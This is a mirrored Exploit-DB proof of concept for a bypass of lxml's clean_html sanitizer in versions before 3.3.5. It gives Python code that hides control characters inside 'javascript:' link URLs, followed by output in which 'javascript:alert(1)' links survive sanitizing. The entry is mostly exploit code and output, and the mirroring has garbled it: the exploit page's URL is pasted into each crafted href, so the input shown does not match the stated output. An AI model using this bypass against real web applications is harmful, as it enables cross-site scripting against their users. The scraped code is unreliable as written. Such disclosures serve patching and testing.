lxml – ‘clean_html’ Security Bypass

• Exploit Database
• 138 阅读

• 作者： Maksim Kochkin
  日期： 2014-04-15
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/39155/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

  source: https://www.securityfocus.com/bid/67159/info   lxml is prone to a security-bypass vulnerability.   An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks.   Versions prior to lxml 3.3.5 are vulnerable.   from lxml.html.clean import clean_html   html = &apos;&apos;&apos;\ <html> <body> <a href="javascript:alert(0)"> aaa</a> <a href="https://www.exploit-db.com/exploits/39155/javas\x01cript:alert(1)">bbb</a> <a href="https://www.exploit-db.com/exploits/39155/javas\x02cript:alert(1)">bbb</a> <a href="https://www.exploit-db.com/exploits/39155/javas\x03cript:alert(1)">bbb</a> <a href="https://www.exploit-db.com/exploits/39155/javas\x04cript:alert(1)">bbb</a> <a href="https://www.exploit-db.com/exploits/39155/javas\x05cript:alert(1)">bbb</a> <a href="https://www.exploit-db.com/exploits/39155/javas\x06cript:alert(1)">bbb</a> <a href="https://www.exploit-db.com/exploits/39155/javas\x07cript:alert(1)">bbb</a> <a href="https://www.exploit-db.com/exploits/39155/javas\x08cript:alert(1)">bbb</a> <a href="https://www.exploit-db.com/exploits/39155/javas\x09cript:alert(1)">bbb</a> </body> </html>&apos;&apos;&apos;   print clean_html(html)     Output:   <div> <body> <a href="https://www.exploit-db.com/exploits/39155/">aaa</a> <a href="javascript:alert(1)"> bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="https://www.exploit-db.com/exploits/39155/">bbb</a> </body> </div>